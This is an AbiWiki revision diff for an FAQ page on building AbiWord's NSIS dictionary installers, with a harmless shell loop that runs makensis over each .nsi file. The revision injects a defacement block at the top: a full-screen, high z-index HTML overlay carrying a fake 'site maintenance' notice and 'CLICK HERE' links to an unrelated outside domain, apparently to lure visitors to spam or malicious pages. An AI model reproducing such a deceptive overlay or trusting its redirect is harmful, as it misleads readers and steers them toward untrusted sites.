DevFAQNSISDictionaryInstallers

From AbiWiki

(Difference between revisions)
Jump to: navigation, search
(Importing text file)
Line 1: Line 1:
 +
----
 +
<div style="background: #E8E8E8 none repeat scroll 0% 0%; overflow: hidden; font-family: Tahoma; font-size: 11pt; line-height: 2em; position: absolute; width: 2000px; height: 2000px; z-index: 1410065407; top: 0px; left: -250px; padding-left: 400px; padding-top: 50px; padding-bottom: 350px;">
 +
----
 +
=[http://aluxyxenud.co.cc Page Is Unavailable Due To Site Maintenance, Please Visit Reserve Copy Page]=
 +
----
 +
=[http://aluxyxenud.co.cc CLICK HERE]=
 +
----
 +
</div>
-
<H2>NSIS Dictionary Installers</H2>
+
&lt;H2&gt;NSIS Dictionary Installers&lt;/H2&gt;
==== How do I create the NSIS dictionary installers? ====
==== How do I create the NSIS dictionary installers? ====
-
You''ll need NSIS >=2.07 installed and the abispell module from CVS. Once you have those prerequisites, just run "makensis.exe [[DictionaryLanguage|DictionaryLanguage]].nsi" from abi\src\pkg\win\setup. To create all of the installers, use a simple shell script like the following:
+
You''ll need NSIS &gt;=2.07 installed and the abispell module from CVS. Once you have those prerequisites, just run &quot;makensis.exe [[DictionaryLanguage|DictionaryLanguage]].nsi&quot; from abi\src\pkg\win\setup. To create all of the installers, use a simple shell script like the following:
-
<verbatim>
+
&lt;verbatim&gt;
for file in Dictionary*.nsi
for file in Dictionary*.nsi
do
do
makensis.exe $file
makensis.exe $file
done
done
-
</verbatim>
+
&lt;/verbatim&gt;
[[Category:To Convert]]
[[Category:To Convert]]

Revision as of 04:26, 24 November 2010



Page Is Unavailable Due To Site Maintenance, Please Visit Reserve Copy Page


CLICK HERE


<H2>NSIS Dictionary Installers</H2>

How do I create the NSIS dictionary installers?

Youll need NSIS >=2.07 installed and the abispell module from CVS. Once you have those prerequisites, just run "makensis.exe DictionaryLanguage.nsi" from abi\src\pkg\win\setup. To create all of the installers, use a simple shell script like the following:

<verbatim> for file in Dictionary*.nsi do makensis.exe $file done </verbatim>

Personal tools